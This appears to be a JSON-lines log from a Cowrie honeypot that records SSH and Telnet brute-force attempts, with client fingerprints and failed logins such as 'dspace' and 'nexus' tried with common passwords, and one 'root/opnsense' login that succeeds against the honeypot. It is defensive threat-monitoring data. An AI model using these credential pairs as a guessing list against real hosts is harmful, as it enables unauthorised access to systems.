{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:27:26.448886Z","src_ip":"212.227.125.160","session":"5d6885710747"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"password","message":"login attempt [dspace/password] failed","sensor":"my-vps","timestamp":"2025-08-28T14:27:26.980728Z","src_ip":"212.227.125.160","session":"5d6885710747"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:27:28.168103Z","src_ip":"212.227.125.160","session":"5d6885710747"}
{"eventid":"cowrie.session.connect","src_ip":"183.106.162.60","src_port":33711,"dst_ip":"1.2.3.4","dst_port":23,"session":"b251899f184c","protocol":"telnet","message":"New connection: 183.106.162.60:33711 (1.2.3.4:23) [session: b251899f184c]","sensor":"my-vps","timestamp":"2025-08-28T14:27:31.031418Z"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.20","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"b83a3ced34bc","protocol":"ssh","message":"New connection: 194.0.234.20:65105 (1.2.3.4:22) [session: b83a3ced34bc]","sensor":"my-vps","timestamp":"2025-08-28T14:27:58.906180Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:27:58.924505Z","src_ip":"194.0.234.20","session":"b83a3ced34bc"}
{"eventid":"cowrie.session.closed","duration":30.36631727218628,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:28:01.397656Z","src_ip":"183.106.162.60","session":"b251899f184c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47606,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d2beebda65e","protocol":"ssh","message":"New connection: 212.227.125.160:47606 (1.2.3.4:22) [session: 0d2beebda65e]","sensor":"my-vps","timestamp":"2025-08-28T14:28:03.363184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:28:03.364196Z","src_ip":"212.227.125.160","session":"0d2beebda65e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:28:03.548491Z","src_ip":"212.227.125.160","session":"0d2beebda65e"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"123456789","message":"login attempt [dspace/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T14:28:04.087925Z","src_ip":"212.227.125.160","session":"0d2beebda65e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:28:05.268070Z","src_ip":"212.227.125.160","session":"0d2beebda65e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36251,"dst_ip":"1.2.3.4","dst_port":22,"session":"264d1872f4f2","protocol":"ssh","message":"New connection: 212.227.235.229:36251 (1.2.3.4:22) [session: 264d1872f4f2]","sensor":"my-vps","timestamp":"2025-08-28T14:28:09.588542Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T14:28:09.589718Z","src_ip":"212.227.235.229","session":"264d1872f4f2"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T14:28:09.716218Z","src_ip":"212.227.235.229","session":"264d1872f4f2"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-28T14:28:10.314194Z","src_ip":"212.227.235.229","session":"264d1872f4f2"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"abc123","message":"login attempt [nexus/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:28:11.443152Z","src_ip":"212.227.235.229","session":"264d1872f4f2"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"abcd123","message":"login attempt [nexus/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:28:12.583471Z","src_ip":"212.227.235.229","session":"264d1872f4f2"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"abcd1234","message":"login attempt [nexus/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T14:28:13.711750Z","src_ip":"212.227.235.229","session":"264d1872f4f2"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"abc1234","message":"login attempt [nexus/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T14:28:14.839785Z","src_ip":"212.227.235.229","session":"264d1872f4f2"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:28:15.968816Z","src_ip":"212.227.235.229","session":"264d1872f4f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60002,"dst_ip":"1.2.3.4","dst_port":22,"session":"42c50ff58824","protocol":"ssh","message":"New connection: 212.227.125.160:60002 (1.2.3.4:22) [session: 42c50ff58824]","sensor":"my-vps","timestamp":"2025-08-28T14:28:39.544888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:28:39.545825Z","src_ip":"212.227.125.160","session":"42c50ff58824"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:28:39.721376Z","src_ip":"212.227.125.160","session":"42c50ff58824"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"12345","message":"login attempt [dspace/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T14:28:40.250800Z","src_ip":"212.227.125.160","session":"42c50ff58824"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:28:41.429134Z","src_ip":"212.227.125.160","session":"42c50ff58824"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55566,"dst_ip":"1.2.3.4","dst_port":22,"session":"986da90d3400","protocol":"ssh","message":"New connection: 212.227.125.160:55566 (1.2.3.4:22) [session: 986da90d3400]","sensor":"my-vps","timestamp":"2025-08-28T14:29:15.373116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:29:15.439991Z","src_ip":"212.227.125.160","session":"986da90d3400"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:29:15.734585Z","src_ip":"212.227.125.160","session":"986da90d3400"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"12345678","message":"login attempt [dspace/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T14:29:16.311579Z","src_ip":"212.227.125.160","session":"986da90d3400"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:29:17.494841Z","src_ip":"212.227.125.160","session":"986da90d3400"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38464,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3e4427e9f93","protocol":"ssh","message":"New connection: 212.227.125.160:38464 (1.2.3.4:22) [session: f3e4427e9f93]","sensor":"my-vps","timestamp":"2025-08-28T14:29:50.526426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:29:50.527478Z","src_ip":"212.227.125.160","session":"f3e4427e9f93"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:29:50.693966Z","src_ip":"212.227.125.160","session":"f3e4427e9f93"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"qwerty","message":"login attempt [dspace/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T14:29:51.183855Z","src_ip":"212.227.125.160","session":"f3e4427e9f93"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:29:52.348727Z","src_ip":"212.227.125.160","session":"f3e4427e9f93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51584,"dst_ip":"1.2.3.4","dst_port":22,"session":"a775dd8c3f50","protocol":"ssh","message":"New connection: 212.227.125.160:51584 (1.2.3.4:22) [session: a775dd8c3f50]","sensor":"my-vps","timestamp":"2025-08-28T14:30:25.680297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:30:25.757064Z","src_ip":"212.227.125.160","session":"a775dd8c3f50"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:30:25.885344Z","src_ip":"212.227.125.160","session":"a775dd8c3f50"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"123123","message":"login attempt [dspace/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:30:26.584795Z","src_ip":"212.227.125.160","session":"a775dd8c3f50"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:30:27.756385Z","src_ip":"212.227.125.160","session":"a775dd8c3f50"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59388,"dst_ip":"1.2.3.4","dst_port":22,"session":"57a1c691e9c7","protocol":"ssh","message":"New connection: 212.227.125.160:59388 (1.2.3.4:22) [session: 57a1c691e9c7]","sensor":"my-vps","timestamp":"2025-08-28T14:31:00.319551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:31:00.320561Z","src_ip":"212.227.125.160","session":"57a1c691e9c7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:31:00.487726Z","src_ip":"212.227.125.160","session":"57a1c691e9c7"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"111111","message":"login attempt [dspace/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T14:31:00.991654Z","src_ip":"212.227.125.160","session":"57a1c691e9c7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:31:02.161834Z","src_ip":"212.227.125.160","session":"57a1c691e9c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45956,"dst_ip":"1.2.3.4","dst_port":22,"session":"a01f464af9ac","protocol":"ssh","message":"New connection: 212.227.125.160:45956 (1.2.3.4:22) [session: a01f464af9ac]","sensor":"my-vps","timestamp":"2025-08-28T14:31:10.530763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:31:10.853042Z","src_ip":"212.227.125.160","session":"a01f464af9ac"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T14:31:10.853753Z","src_ip":"212.227.125.160","session":"a01f464af9ac"}
{"eventid":"cowrie.login.success","username":"root","password":"opnsense","message":"login attempt [root/opnsense] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:31:11.624903Z","src_ip":"212.227.125.160","session":"a01f464af9ac"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:31:11.792049Z","src_ip":"212.227.125.160","session":"a01f464af9ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49656,"dst_ip":"1.2.3.4","dst_port":22,"session":"320cc5c5d6b7","protocol":"ssh","message":"New connection: 212.227.125.160:49656 (1.2.3.4:22) [session: 320cc5c5d6b7]","sensor":"my-vps","timestamp":"2025-08-28T14:31:33.585203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:31:33.586093Z","src_ip":"212.227.125.160","session":"320cc5c5d6b7"}
